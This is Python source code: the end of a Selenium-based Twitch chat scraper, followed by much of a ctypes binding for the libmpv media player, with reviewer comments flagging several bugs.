            self.callback_error('ChatBot.py > process_messges() > usuário e cor', self.channel, str(e),
                                str(chatElement.get_attribute('innerHTML')))
        try:
            message = ""
            for chatText in chatElement.find_elements(By.CSS_SELECTOR,
                    ".text-fragment, .link-fragment, .mention-fragment, .chat-line__message--deleted-notice, .chat-line__message--emote"):
                if "chat-line__message--emote" in chatText.get_attribute("class"):
                    # Emote images contribute their alt text to the message body.
                    try:
                        chatMsg['emotes'].append({"alt": chatText.get_attribute("alt"), "src": chatText.get_attribute("src")})
                        message += chatText.get_attribute("alt")
                        message += ' '
                    except:
                        pass
                else:
                    message += chatText.text + ' '
            chatMsg['message'] = message.strip()
        except Exception as e:
            self.callback_error('ChatBot.py > process_messges() > message e emotes', self.channel, str(e),
                                str(chatElement.get_attribute('innerHTML')))
        try:
            for badgeElement in chatElement.find_elements(By.CLASS_NAME, 'chat-badge'):
                src = badgeElement.get_attribute("src")
                # Swap the trailing size suffix for '2' (larger badge image).
                src = src[0: len(src) - 1] + '2'
                alt = badgeElement.get_attribute("alt")
                chatMsg['badges'].append({"src": src, "alt": alt})
        except Exception as e:
            self.callback_error('ChatBot.py > process_messges() > capturar badges', self.channel, str(e),
                                str(chatElement.get_attribute('innerHTML')))
        try:
            # Re-class the element as 'captured' and stamp our synthetic id on
            # it, so list_chat() skips it and list_deleted() can find it later.
            self.browser.execute_script(
                "let element = arguments[0];" +
                "let clsname = element.className;"
                "if (clsname.includes('chat-line__message') || clsname.includes('chat-line--inline'))" +
                "{element.setAttribute('class','captured');" +
                "element.setAttribute('id','" + chatMsg['id'] + "');}", chatElement)
        except Exception as e:
            self.callback_error('ChatBot.py > process_messges() > executar script de captura', self.channel, str(e),
                                str(chatElement.get_attribute('innerHTML')))
        return chatMsg

    def list_chat(self):
        """Harvest all not-yet-captured messages; maintain delay/mps stats.

        Also refreshes the page once refreshHour is reached. Returns the list
        of message dicts captured in this pass.
        """
        msgs = []
        try:
            if (self.channel.lower() in self.browser.current_url.lower()):
                chatElements = self.browser.find_elements(By.CLASS_NAME, 'chat-line__message')
                for chatElement in chatElements:
                    if (chatElement != []):
                        chatMsg = self.process_messges(chatElement)
                        msgs.append(chatMsg)
                        if self.chat_message_callback != None:
                            self.chat_message_callback(chatMsg)
                        chatElement = []
                        # Rolling window of the last 100 capture timings.
                        self.stored_msgs.append({
                            'delay': chatMsg['delay'],
                            'datetime': datetime.now()
                        })
                        self.stored_msgs = self.stored_msgs[-100:]
                        delay_total = 0
                        for msg in self.stored_msgs:
                            delay_total += msg['delay']
                        self.avg_delay = int(delay_total / len(self.stored_msgs))
                        if len(self.stored_msgs) > 10:
                            # Messages-per-second over the window, truncated to
                            # 2 decimals. NOTE(review): stored_time can be 0 if
                            # >10 messages arrive within the same second →
                            # ZeroDivisionError (swallowed by the outer except);
                            # confirm whether that is acceptable.
                            stored_time = abs(self.stored_msgs[-1]['datetime']-self.stored_msgs[0]['datetime']).seconds
                            self.mps = len(self.stored_msgs) / stored_time
                            factor = 10.0 ** 2
                            self.mps = math.trunc(self.mps * factor) / factor
            else:
                # Browser navigated away from the channel's chat page.
                self.error = 1
        except Exception as e:
            self.callback_error('ChatBot.py > listChat()', self.channel, str(e), '')
            self.error = 1
        if self.isReady:
            # Reload the page at the scheduled time (once per hour).
            if (datetime.now() >= self.refreshHour):
                try:
                    self.refreshHour = datetime.now() + timedelta(minutes=60)
                    self.browser.refresh()
                    time.sleep(1)
                except Exception as e:
                    self.callback_error('ChatBot.py > listChat() > refresh', self.channel, str(e), '')
        #################################################
        return msgs
mpv.py
# -*- coding: utf-8 -*-
'''
Python interface to the awesome mpv media player

Created on 2017-02-19
@author: jaseg

forked from: https://github.com/jaseg/python-mpv
'''

from ctypes import *
import ctypes.util
import threading
import os
import sys
from warnings import warn
from functools import partial
import collections
import re
import traceback

# vim: ts=4 sw=4 et

# Locate and load libmpv. On Windows the DLL must be on the search path; on
# POSIX we ask ctypes.util to find it.
if os.name == 'nt':
    backend = CDLL('mpv-1.dll')
    fs_enc = 'utf-8'
else:
    import locale
    lc, enc = locale.getlocale(locale.LC_NUMERIC)
    # libmpv requires LC_NUMERIC to be set to "C". Since messing with global variables everyone else relies upon is
    # still better than segfaulting, we are setting LC_NUMERIC to "C".
    locale.setlocale(locale.LC_NUMERIC, 'C')
    sofile = ctypes.util.find_library('mpv')
    if sofile is None:
        raise OSError("Cannot find libmpv in the usual places. Depending on your distro, you may try installing an "
                "mpv-devel or mpv-libs package. If you have libmpv around but this script can't find it, maybe consult "
                "the documentation for ctypes.util.find_library which this script uses to look up the library "
                "filename.")
    backend = CDLL(sofile)
    fs_enc = sys.getfilesystemencoding()


# Opaque libmpv handle types (typed void pointers, for argtype checking only).
class MpvHandle(c_void_p):
    pass

class MpvOpenGLCbContext(c_void_p):
    pass


class PropertyUnavailableError(AttributeError):
    # Raised when libmpv reports MPV_ERROR_PROPERTY_UNAVAILABLE.
    pass

class ErrorCode(object):
    """ For documentation on these, see mpv's libmpv/client.h """
    SUCCESS = 0
    EVENT_QUEUE_FULL = -1
    NOMEM = -2
    UNINITIALIZED = -3
    INVALID_PARAMETER = -4
    OPTION_NOT_FOUND = -5
    OPTION_FORMAT = -6
    OPTION_ERROR = -7
    PROPERTY_NOT_FOUND = -8
    PROPERTY_FORMAT = -9
    PROPERTY_UNAVAILABLE = -10
    PROPERTY_ERROR = -11
    COMMAND = -12

    # Maps each libmpv error code to a factory producing a fitting Python
    # exception; 0 (success) maps to None so raise_for_ec does nothing.
    EXCEPTION_DICT = {
             0: None,
            -1: lambda *a: MemoryError('mpv event queue full', *a),
            -2: lambda *a: MemoryError('mpv cannot allocate memory', *a),
            -3: lambda *a: ValueError('Uninitialized mpv handle used', *a),
            -4: lambda *a: ValueError('Invalid value for mpv parameter', *a),
            -5: lambda *a: AttributeError('mpv option does not exist', *a),
            -6: lambda *a: TypeError('Tried to set mpv option using wrong format', *a),
            -7: lambda *a: ValueError('Invalid value for mpv option', *a),
            -8: lambda *a: AttributeError('mpv property does not exist', *a),
            # Currently (mpv 0.18.1) there is a bug causing a PROPERTY_FORMAT error to be returned instead of
            # INVALID_PARAMETER when setting a property-mapped option to an invalid value.
            -9: lambda *a: TypeError('Tried to get/set mpv property using wrong format, or passed invalid value', *a),
            -10: lambda *a: PropertyUnavailableError('mpv property is not available', *a),
            -11: lambda *a: RuntimeError('Generic error getting or setting mpv property', *a),
            -12: lambda *a: SystemError('Error running mpv command', *a) }

    @staticmethod
    def default_error_handler(ec, *args):
        # Fallback for error codes not in EXCEPTION_DICT: wrap libmpv's own
        # error string in a ValueError.
        return ValueError(_mpv_error_string(ec).decode('utf-8'), ec, *args)

    @classmethod
    def raise_for_ec(kls, ec, func, *args):
        # ctypes errcheck hook: positive return values are success payloads,
        # so clamp them to 0 before the lookup.
        ec = 0 if ec > 0 else ec
        ex = kls.EXCEPTION_DICT.get(ec , kls.default_error_handler)
        if ex:
            raise ex(ec, *args)


class MpvFormat(c_int):
    # Mirrors enum mpv_format from libmpv/client.h.
    NONE = 0
    STRING = 1
    OSD_STRING = 2
    FLAG = 3
    INT64 = 4
    DOUBLE = 5
    NODE = 6
    NODE_ARRAY = 7
    NODE_MAP = 8
    BYTE_ARRAY = 9

    def __eq__(self, other):
        # Allow comparison against other MpvFormat instances and raw ints.
        return self is other or self.value == other or self.value == int(other)

    def __repr__(self):
        return ['NONE', 'STRING', 'OSD_STRING', 'FLAG', 'INT64', 'DOUBLE', 'NODE', 'NODE_ARRAY', 'NODE_MAP',
                'BYTE_ARRAY'][self.value]


class MpvEventID(c_int):
    # Mirrors enum mpv_event_id from libmpv/client.h.
    NONE = 0
    SHUTDOWN = 1
    LOG_MESSAGE = 2
    GET_PROPERTY_REPLY = 3
    SET_PROPERTY_REPLY = 4
    COMMAND_REPLY = 5
    START_FILE = 6
    END_FILE = 7
    FILE_LOADED = 8
    TRACKS_CHANGED = 9
    TRACK_SWITCHED = 10
    IDLE = 11
    PAUSE = 12
    UNPAUSE = 13
    TICK = 14
    SCRIPT_INPUT_DISPATCH = 15
    CLIENT_MESSAGE = 16
    VIDEO_RECONFIG = 17
    AUDIO_RECONFIG = 18
    METADATA_UPDATE = 19
    SEEK = 20
    PLAYBACK_RESTART = 21
    PROPERTY_CHANGE = 22
    CHAPTER_CHANGE = 23

    # Convenience tuple of every event id except NONE.
    ANY = ( SHUTDOWN, LOG_MESSAGE, GET_PROPERTY_REPLY, SET_PROPERTY_REPLY, COMMAND_REPLY, START_FILE, END_FILE,
            FILE_LOADED, TRACKS_CHANGED, TRACK_SWITCHED, IDLE, PAUSE, UNPAUSE, TICK, SCRIPT_INPUT_DISPATCH,
            CLIENT_MESSAGE, VIDEO_RECONFIG, AUDIO_RECONFIG, METADATA_UPDATE, SEEK, PLAYBACK_RESTART, PROPERTY_CHANGE,
            CHAPTER_CHANGE )

    def __repr__(self):
        return ['NONE', 'SHUTDOWN', 'LOG_MESSAGE', 'GET_PROPERTY_REPLY', 'SET_PROPERTY_REPLY', 'COMMAND_REPLY',
                'START_FILE', 'END_FILE', 'FILE_LOADED', 'TRACKS_CHANGED', 'TRACK_SWITCHED', 'IDLE', 'PAUSE', 'UNPAUSE',
                'TICK', 'SCRIPT_INPUT_DISPATCH', 'CLIENT_MESSAGE', 'VIDEO_RECONFIG', 'AUDIO_RECONFIG',
                'METADATA_UPDATE', 'SEEK', 'PLAYBACK_RESTART', 'PROPERTY_CHANGE', 'CHAPTER_CHANGE'][self.value]


class MpvNodeList(Structure):
    # C struct mpv_node_list; _fields_ is assigned after MpvNode is defined
    # (see below) because the two types reference each other.
    def array_value(self, decode_str=False):
        # Interpret this node list as a plain Python list.
        return [ self.values[i].node_value(decode_str) for i in range(self.num) ]

    def dict_value(self, decode_str=False):
        # Interpret this node list as a dict (keys are always UTF-8 strings).
        return { self.keys[i].decode('utf-8'): self.values[i].node_value(decode_str) for i in range(self.num) }

class MpvNode(Structure):
    # C struct mpv_node: a tagged union (val interpreted according to format).
    _fields_ = [('val', c_longlong),
                ('format', MpvFormat)]

    def node_value(self, decode_str=False):
        return MpvNode.node_cast_value(byref(c_void_p(self.val)), self.format.value, decode_str)

    @staticmethod
    def node_cast_value(v, fmt, decode_str=False):
        # Cast the raw pointer `v` to the Python value described by `fmt`.
        # STRING is decoded only when decode_str is set; OSD_STRING always.
        dwrap = lambda s: s.decode('utf-8') if decode_str else s
        return {
            MpvFormat.NONE:         lambda v: None,
            MpvFormat.STRING:       lambda v: dwrap(cast(v, POINTER(c_char_p)).contents.value),
            MpvFormat.OSD_STRING:   lambda v: cast(v, POINTER(c_char_p)).contents.value.decode('utf-8'),
            MpvFormat.FLAG:         lambda v: bool(cast(v, POINTER(c_int)).contents.value),
            MpvFormat.INT64:        lambda v: cast(v, POINTER(c_longlong)).contents.value,
            MpvFormat.DOUBLE:       lambda v: cast(v, POINTER(c_double)).contents.value,
            MpvFormat.NODE:         lambda v: cast(v, POINTER(MpvNode)).contents.node_value(decode_str),
            MpvFormat.NODE_ARRAY:   lambda v: cast(v, POINTER(POINTER(MpvNodeList))).contents.contents.array_value(decode_str),
            MpvFormat.NODE_MAP:     lambda v: cast(v, POINTER(POINTER(MpvNodeList))).contents.contents.dict_value(decode_str),
            MpvFormat.BYTE_ARRAY:   lambda v: cast(v, POINTER(c_char_p)).contents.value,
        }[fmt](v)

# Deferred field assignment to break the MpvNode <-> MpvNodeList cycle.
MpvNodeList._fields_ = [('num', c_int),
                        ('values', POINTER(MpvNode)),
                        ('keys', POINTER(c_char_p))]


class MpvSubApi(c_int):
    MPV_SUB_API_OPENGL_CB = 1

class MpvEvent(Structure):
    # C struct mpv_event: header common to every event delivered by libmpv.
    _fields_ = [('event_id', MpvEventID),
                ('error', c_int),
                ('reply_userdata', c_ulonglong),
                ('data', c_void_p)]

    def as_dict(self):
        # Decode the event-specific payload (if any) into a nested dict.
        dtype = {MpvEventID.END_FILE:               MpvEventEndFile,
                 MpvEventID.PROPERTY_CHANGE:        MpvEventProperty,
                 MpvEventID.GET_PROPERTY_REPLY:     MpvEventProperty,
                 MpvEventID.LOG_MESSAGE:            MpvEventLogMessage,
                 MpvEventID.SCRIPT_INPUT_DISPATCH:  MpvEventScriptInputDispatch,
                 MpvEventID.CLIENT_MESSAGE:         MpvEventClientMessage
            }.get(self.event_id.value, None)
        return {'event_id': self.event_id.value,
                'error': self.error,
                'reply_userdata': self.reply_userdata,
                'event': cast(self.data, POINTER(dtype)).contents.as_dict() if dtype else None}

class MpvEventProperty(Structure):
    # C struct mpv_event_property.
    _fields_ = [('name', c_char_p),
                ('format', MpvFormat),
                ('data', c_void_p)]

    def as_dict(self):
        if self.format.value == MpvFormat.STRING:
            # Coerce the string payload through the property's registered
            # Python type from ALL_PROPERTIES (defaults to str).
            proptype, _access = ALL_PROPERTIES.get(self.name, (str, None))
            return {'name': self.name.decode('utf-8'),
                    'format': self.format,
                    'data': self.data,
                    'value': proptype(cast(self.data, POINTER(c_char_p)).contents.value.decode('utf-8'))}
        else:
            return {'name': self.name.decode('utf-8'),
                    'format': self.format,
                    'data': self.data}

class MpvEventLogMessage(Structure):
    # C struct mpv_event_log_message.
    _fields_ = [('prefix', c_char_p),
                ('level', c_char_p),
                ('text', c_char_p)]

    def as_dict(self):
        return { 'prefix': self.prefix.decode('utf-8'),
                 'level':  self.level.decode('utf-8'),
                 'text':   self.text.decode('utf-8').rstrip() }

class MpvEventEndFile(c_int):
    # Mirrors enum mpv_end_file_reason.
    EOF_OR_INIT_FAILURE = 0
    RESTARTED = 1
    ABORTED = 2
    QUIT = 3

    def as_dict(self):
        return {'reason': self.value}

class MpvEventScriptInputDispatch(Structure):
    # Deprecated libmpv event; payload decoding never implemented.
    _fields_ = [('arg0', c_int),
                ('type', c_char_p)]

    def as_dict(self):
        pass # TODO

class MpvEventClientMessage(Structure):
    # C struct mpv_event_client_message (e.g. script-message, key bindings).
    _fields_ = [('num_args', c_int),
                ('args', POINTER(c_char_p))]

    def as_dict(self):
        return { 'args': [ self.args[i].decode('utf-8') for i in range(self.num_args) ] }


# C callback signatures used by the wakeup and OpenGL-CB APIs.
WakeupCallback = CFUNCTYPE(None, c_void_p)

OpenGlCbUpdateFn = CFUNCTYPE(None, c_void_p)
OpenGlCbGetProcAddrFn = CFUNCTYPE(None, c_void_p, c_char_p)

def _handle_func(name, args, restype, errcheck, ctx=MpvHandle):
    # Bind libmpv function `name`, prepending the context handle type to its
    # argtypes, and export it into module globals as _<name>.
    func = getattr(backend, name)
    func.argtypes = [ctx] + args if ctx else args
    if restype is not None:
        func.restype = restype
    if errcheck is not None:
        func.errcheck = errcheck
    globals()['_'+name] = func

def bytes_free_errcheck(res, func, *args):
    # errcheck for calls returning a malloc'd string: copy the value, then
    # hand the buffer back to libmpv via mpv_free.
    notnull_errcheck(res, func, *args)
    rv = cast(res, c_void_p).value
    _mpv_free(res)
    return rv

def notnull_errcheck(res, func, *args):
    # errcheck for calls where a NULL return signals failure.
    if res is None:
        raise RuntimeError('Underspecified error in MPV when calling {} with args {!r}: NULL pointer returned.'\
                'Please consult your local debugger.'.format(func.__name__, args))
    return res

ec_errcheck = ErrorCode.raise_for_ec

def _handle_gl_func(name, args=[], restype=None):
    # Like _handle_func, but for the OpenGL-CB sub-API context.
    _handle_func(name, args, restype, errcheck=None, ctx=MpvOpenGLCbContext)

backend.mpv_client_api_version.restype = c_ulong
def _mpv_client_api_version():
    # Returns (major, minor) of the loaded libmpv client API.
    ver = backend.mpv_client_api_version()
    return ver>>16, ver&0xFFFF

backend.mpv_free.argtypes = [c_void_p]
_mpv_free = backend.mpv_free

backend.mpv_free_node_contents.argtypes = [c_void_p]
_mpv_free_node_contents = backend.mpv_free_node_contents

backend.mpv_create.restype = MpvHandle
_mpv_create = backend.mpv_create

# Prototype declarations for the libmpv client API. First list element(s) are
# the arguments after the implicit MpvHandle; see libmpv/client.h.
_handle_func('mpv_create_client', [c_char_p], MpvHandle, notnull_errcheck)
_handle_func('mpv_client_name', [], c_char_p, errcheck=None)
_handle_func('mpv_initialize', [], c_int, ec_errcheck)
_handle_func('mpv_detach_destroy', [], None, errcheck=None)
_handle_func('mpv_terminate_destroy', [], None, errcheck=None)
_handle_func('mpv_load_config_file', [c_char_p], c_int, ec_errcheck)
_handle_func('mpv_suspend', [], None, errcheck=None)
_handle_func('mpv_resume', [], None, errcheck=None)
_handle_func('mpv_get_time_us', [], c_ulonglong, errcheck=None)

_handle_func('mpv_set_option', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_set_option_string', [c_char_p, c_char_p], c_int, ec_errcheck)

_handle_func('mpv_command', [POINTER(c_char_p)], c_int, ec_errcheck)
# NOTE(review): libmpv's mpv_command_string takes (handle, const char*); the
# second c_char_p here looks like one argument too many — confirm against
# client.h before relying on _mpv_command_string.
_handle_func('mpv_command_string', [c_char_p, c_char_p], c_int, ec_errcheck)
_handle_func('mpv_command_async', [c_ulonglong, POINTER(c_char_p)], c_int, ec_errcheck)

_handle_func('mpv_set_property', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_set_property_string', [c_char_p, c_char_p], c_int, ec_errcheck)
_handle_func('mpv_set_property_async', [c_ulonglong, c_char_p, MpvFormat,c_void_p],c_int, ec_errcheck)
_handle_func('mpv_get_property', [c_char_p, MpvFormat, c_void_p], c_int, ec_errcheck)
_handle_func('mpv_get_property_string', [c_char_p], c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_osd_string', [c_char_p], c_void_p, bytes_free_errcheck)
_handle_func('mpv_get_property_async', [c_ulonglong, c_char_p, MpvFormat], c_int, ec_errcheck)
_handle_func('mpv_observe_property', [c_ulonglong, c_char_p, MpvFormat], c_int, ec_errcheck)
_handle_func('mpv_unobserve_property', [c_ulonglong], c_int, ec_errcheck)

_handle_func('mpv_event_name', [c_int], c_char_p, errcheck=None, ctx=None)
_handle_func('mpv_error_string', [c_int], c_char_p, errcheck=None, ctx=None)

_handle_func('mpv_request_event', [MpvEventID, c_int], c_int, ec_errcheck)
_handle_func('mpv_request_log_messages', [c_char_p], c_int, ec_errcheck)
_handle_func('mpv_wait_event', [c_double], POINTER(MpvEvent), errcheck=None)
_handle_func('mpv_wakeup', [], None, errcheck=None)
_handle_func('mpv_set_wakeup_callback', [WakeupCallback, c_void_p], None, errcheck=None)
_handle_func('mpv_get_wakeup_pipe', [], c_int, errcheck=None)

_handle_func('mpv_get_sub_api', [MpvSubApi], c_void_p, notnull_errcheck)

_handle_gl_func('mpv_opengl_cb_set_update_callback', [OpenGlCbUpdateFn, c_void_p])
_handle_gl_func('mpv_opengl_cb_init_gl', [c_char_p, OpenGlCbGetProcAddrFn, c_void_p], c_int)
_handle_gl_func('mpv_opengl_cb_draw', [c_int, c_int, c_int], c_int)
_handle_gl_func('mpv_opengl_cb_render', [c_int, c_int], c_int)
_handle_gl_func('mpv_opengl_cb_report_flip', [c_ulonglong], c_int)
_handle_gl_func('mpv_opengl_cb_uninit_gl', [], c_int)

def _ensure_encoding(possibly_bytes):
    # Decode bytes to str; pass anything else through unchanged.
    return possibly_bytes.decode('utf-8') if type(possibly_bytes) is bytes else possibly_bytes


def _event_generator(handle):
    # Blocking generator yielding libmpv events until a NONE event arrives.
    while True:
        event = _mpv_wait_event(handle, -1).contents
        if event.event_id.value == MpvEventID.NONE:
            # NOTE(review): raising StopIteration inside a generator is a
            # RuntimeError on Python 3.7+ (PEP 479); this should be `return`.
            raise StopIteration()
        yield event


def load_lua():
    """ Use this function if you intend to use mpv's built-in lua interpreter. This is e.g. needed for playback of
    youtube urls. """
    CDLL('liblua.so', mode=RTLD_GLOBAL)


def _event_loop(event_handle, playback_cond, event_callbacks, message_handlers, property_handlers, log_handler):
    # Runs on the MPVEventHandlerThread: dispatches each event to the
    # registered callbacks/handlers until SHUTDOWN detaches the handle.
    for event in _event_generator(event_handle):
        try:
            devent = event.as_dict() # copy data from ctypes
            eid = devent['event_id']
            for callback in event_callbacks:
                callback(devent)
            if eid in (MpvEventID.SHUTDOWN, MpvEventID.END_FILE):
                # Wake anyone blocked in wait_for_playback().
                with playback_cond:
                    playback_cond.notify_all()
            if eid == MpvEventID.PROPERTY_CHANGE:
                pc = devent['event']
                name = pc['name']
                # Property handlers get either the coerced value, None, or the
                # raw (data, format) pair depending on what libmpv delivered.
                if 'value' in pc:
                    proptype, _access = ALL_PROPERTIES[name]
                    if proptype is bytes:
                        args = (pc['value'],)
                    else:
                        args = (proptype(_ensure_encoding(pc['value'])),)
                elif pc['format'] == MpvFormat.NONE:
                    args = (None,)
                else:
                    args = (pc['data'], pc['format'])
                for handler in property_handlers[name]:
                    handler(*args)
            if eid == MpvEventID.LOG_MESSAGE and log_handler is not None:
                ev = devent['event']
                log_handler(ev['level'], ev['prefix'], ev['text'])
            if eid == MpvEventID.CLIENT_MESSAGE:
                # {'event': {'args': ['key-binding', 'foo', 'u-', 'g']}, 'reply_userdata': 0, 'error': 0, 'event_id': 16}
                target, *args = devent['event']['args']
                if target in message_handlers:
                    message_handlers[target](*args)
            if eid == MpvEventID.SHUTDOWN:
                _mpv_detach_destroy(event_handle)
                return
        except Exception as e:
            traceback.print_exc()

class MPV(object):
    """ See man mpv(1) for the details of the implemented commands. """
    def __init__(self, *extra_mpv_flags, log_handler=None, start_event_thread=True, **extra_mpv_opts):
        """ Create an MPV instance.

        Extra arguments and extra keyword arguments will be passed to mpv as options. """
        # NOTE(review): self._event_thread is assigned here and again below in
        # both branches of `if start_event_thread` — this first assignment is
        # redundant.
        self._event_thread = None

        self.handle = _mpv_create()
        _mpv_set_option_string(self.handle, b'audio-display', b'no')
        # Render option values the way mpv expects (booleans as yes/no).
        istr = lambda o: ('yes' if o else 'no') if type(o) is bool else str(o)
        try:
            for flag in extra_mpv_flags:
                _mpv_set_option_string(self.handle, flag.encode('utf-8'), b'')
            for k,v in extra_mpv_opts.items():
                _mpv_set_option_string(self.handle, k.replace('_', '-').encode('utf-8'), istr(v).encode('utf-8'))
        finally:
            _mpv_initialize(self.handle)

        self._event_callbacks = []
        self._property_handlers = collections.defaultdict(lambda: [])
        self._message_handlers = {}
        self._key_binding_handlers = {}
        self._playback_cond = threading.Condition()
        # Separate client handle dedicated to the event loop.
        self._event_handle = _mpv_create_client(self.handle, b'py_event_handler')
        self._loop = partial(_event_loop, self._event_handle, self._playback_cond, self._event_callbacks,
                self._message_handlers, self._property_handlers, log_handler)
        if start_event_thread:
            self._event_thread = threading.Thread(target=self._loop, name='MPVEventHandlerThread')
            self._event_thread.setDaemon(True)
            self._event_thread.start()
        else:
            self._event_thread = None

        if log_handler is not None:
            self.set_loglevel('terminal-default')

    def wait_for_playback(self):
        """ Waits until playback of the current title is paused or done """
        with self._playback_cond:
            self._playback_cond.wait()

    def wait_for_property(self, name, cond=lambda val: val, level_sensitive=True):
        # Block until property `name` satisfies `cond`. With level_sensitive,
        # the current value is checked first so an already-true condition
        # returns immediately instead of waiting for the next change event.
        sema = threading.Semaphore(value=0)
        def observer(val):
            if cond(val):
                sema.release()
        self.observe_property(name, observer)
        if not level_sensitive or not cond(getattr(self, name.replace('-', '_'))):
            sema.acquire()
        self.unobserve_property(name, observer)

    def __del__(self):
        if self.handle:
            self.terminate()

    def terminate(self):
        # Destroy the core handle; safe to call from the event thread itself.
        self.handle, handle = None, self.handle
        if threading.current_thread() is self._event_thread:
            # Handle special case to allow event handle to be detached.
            # This is necessary since otherwise the event thread would deadlock itself.
            grim_reaper = threading.Thread(target=lambda: _mpv_terminate_destroy(handle))
            grim_reaper.start()
        else:
            _mpv_terminate_destroy(handle)
            if self._event_thread:
                self._event_thread.join()

    def set_loglevel(self, level):
        _mpv_request_log_messages(self._event_handle, level.encode('utf-8'))

    def command(self, name, *args):
        """ Execute a raw command """
        # Build the NULL-terminated char* array libmpv expects; None args are
        # dropped (they mark optional trailing parameters).
        args = [name.encode('utf-8')] + [ (arg if type(arg) is bytes else str(arg).encode('utf-8'))
                for arg in args if arg is not None ] + [None]
        _mpv_command(self.handle, (c_char_p*len(args))(*args))

    # Thin wrappers over mpv input commands; see man mpv(1).
    def seek(self, amount, reference="relative", precision="default-precise"):
        self.command('seek', amount, reference, precision)

    def revert_seek(self):
        self.command('revert_seek');

    def frame_step(self):
        self.command('frame_step')

    def frame_back_step(self):
        self.command('frame_back_step')

    def _add_property(self, name, value=None):
        self.command('add_property', name, value)

    def _cycle_property(self, name, direction='up'):
        self.command('cycle_property', name, direction)

    def _multiply_property(self, name, factor):
        self.command('multiply_property', name, factor)

    def screenshot(self, includes='subtitles', mode='single'):
        self.command('screenshot', includes, mode)

    def screenshot_to_file(self, filename, includes='subtitles'):
        self.command('screenshot_to_file', filename.encode(fs_enc), includes)

    def playlist_next(self, mode='weak'):
        self.command('playlist_next', mode)

    def playlist_prev(self, mode='weak'):
        self.command('playlist_prev', mode)

    @staticmethod
    def _encode_options(options):
        # Render a kwargs dict as mpv's "key=value,key=value" option string.
        return ','.join('{}={}'.format(str(key), str(val)) for key, val in options.items())

    def loadfile(self, filename, mode='replace', **options):
        self.command('loadfile', filename.encode(fs_enc), mode, MPV._encode_options(options))

    def loadlist(self, playlist, mode='replace'):
        self.command('loadlist', playlist.encode(fs_enc), mode)

    def playlist_clear(self):
        self.command('playlist_clear')

    def playlist_remove(self, index='current'):
        self.command('playlist_remove', index)

    def playlist_move(self, index1, index2):
        self.command('playlist_move', index1, index2)

    def run(self, command, *args):
        self.command('run', command, *args)

    def quit(self, code=None):
        self.command('quit', code)

    def quit_watch_later(self, code=None):
        self.command('quit_watch_later', code)

    def sub_add(self, filename):
        self.command('sub_add', filename.encode(fs_enc))

    def sub_remove(self, sub_id=None):
        self.command('sub_remove', sub_id)

    def sub_reload(self, sub_id=None):
        self.command('sub_reload', sub_id)

    def sub_step(self, skip):
        self.command('sub_step', skip)

    def sub_seek(self, skip):
        self.command('sub_seek', skip)

    def toggle_osd(self):
        self.command('osd')

    def show_text(self, string, duration='-', level=None):
        self.command('show_text', string, duration, level)

    def show_progress(self):
        self.command('show_progress')

    def discnav(self, command):
        self.command('discnav', command)

    def write_watch_later_config(self):
        self.command('write_watch_later_config')

    def overlay_add(self, overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride):
        self.command('overlay_add', overlay_id, x, y, file_or_fd, offset, fmt, w, h, stride)

    def overlay_remove(self, overlay_id):
        self.command('overlay_remove', overlay_id)

    def script_message(self, *args):
        self.command('script_message', *args)

    def script_message_to(self, target, *args):
        self.command('script_message_to', target, *args)

    def observe_property(self, name, handler):
        # Register `handler` and subscribe with libmpv; the 64-bit hash of the
        # property name doubles as the reply_userdata key for unobserving.
        self._property_handlers[name].append(handler)
        _mpv_observe_property(self._event_handle, hash(name)&0xffffffffffffffff, name.encode('utf-8'), MpvFormat.STRING)

    def unobserve_property(self, name, handler):
        handlers = self._property_handlers[name]
        handlers.remove(handler)
        if not handlers:
            _mpv_unobserve_property(self._event_handle, hash(name)&0xffffffffffffffff)

    def register_message_handler(self, target, handler):
        self._message_handlers[target] = handler

    def unregister_message_handler(self, target):
        del self._message_handlers[target]

    def register_event_callback(self, callback):
        self._event_callbacks.append(callback)

    def unregister_event_callback(self, callback):
        self._event_callbacks.remove(callback)

    @staticmethod
    def _binding_name(callback_or_cmd):
        # Deterministic input-section name derived from the keydef's hash.
        return 'py_kb_{:016x}'.format(hash(callback_or_cmd)&0xffffffffffffffff)

    def register_key_binding(self, keydef, callback_or_cmd, mode='force'):
        """ BIG FAT WARNING: mpv's key binding mechanism is pretty powerful.  This means, you essentially get arbitrary
        code exectution through key bindings. This interface makes some limited effort to sanitize the keydef given in
        the first parameter, but YOU SHOULD NOT RELY ON THIS IN FOR SECURITY. If your input comes from config files,
        this is completely fine--but, if you are about to pass untrusted input into this parameter, better double-check
        whether this is secure in your case. """
        if not re.match(r'(Shift+)?(Ctrl+)?(Alt+)?(Meta+)?(.|\w+)', keydef):
            raise ValueError('Invalid keydef. Expected format: [Shift+][Ctrl+][Alt+][Meta+]<key>\n'
                    '<key> is either the literal character the key produces (ASCII or Unicode character), or a '
                    'symbolic name (as printed by --input-keylist')
        binding_name = MPV._binding_name(keydef)
        if callable(callback_or_cmd):
            self._key_binding_handlers[binding_name] = callback_or_cmd
            self.register_message_handler('key-binding', self._handle_key_binding_message)
            self.command('define-section',
                    binding_name, '{} script-binding py_event_handler/{}'.format(keydef, binding_name), mode)
        elif isinstance(callback_or_cmd, str):
            self.command('define-section', binding_name, '{} {}'.format(keydef, callback_or_cmd), mode)
        else:
            raise TypeError('register_key_binding expects either an str with an mpv command or a python callable.')
        self.command('enable-section', binding_name)

    def _handle_key_binding_message(self, binding_name, key_state, key_name):
        self._key_binding_handlers[binding_name](key_state, key_name)

    def unregister_key_binding(self, keydef):
        binding_name = MPV._binding_name(keydef)
        self.command('disable-section', binding_name)
        self.command('define-section', binding_name, '')
        # NOTE(review): `callback` is not defined in this scope — this line
        # raises NameError whenever it is reached; it should presumably test
        # `binding_name in self._key_binding_handlers` instead.
        if callable(callback):
            del self._key_binding_handlers[binding_name]
            if not self._key_binding_handlers:
                self.unregister_message_handler('key-binding')

    # Convenience functions
    def play(self, filename):
        self.loadfile(filename)

    # Property accessors
    def _get_property(self, name, proptype=str, decode_str=False):
        # Fetch a property in the ctypes format matching `proptype`, then cast
        # the out-buffer to a Python value, freeing libmpv-owned memory.
        fmt = {int:         MpvFormat.INT64,
               float:       MpvFormat.DOUBLE,
               bool:        MpvFormat.FLAG,
               str:         MpvFormat.STRING,
               bytes:       MpvFormat.STRING,
               commalist:   MpvFormat.STRING,
               MpvFormat.NODE: MpvFormat.NODE}[proptype]

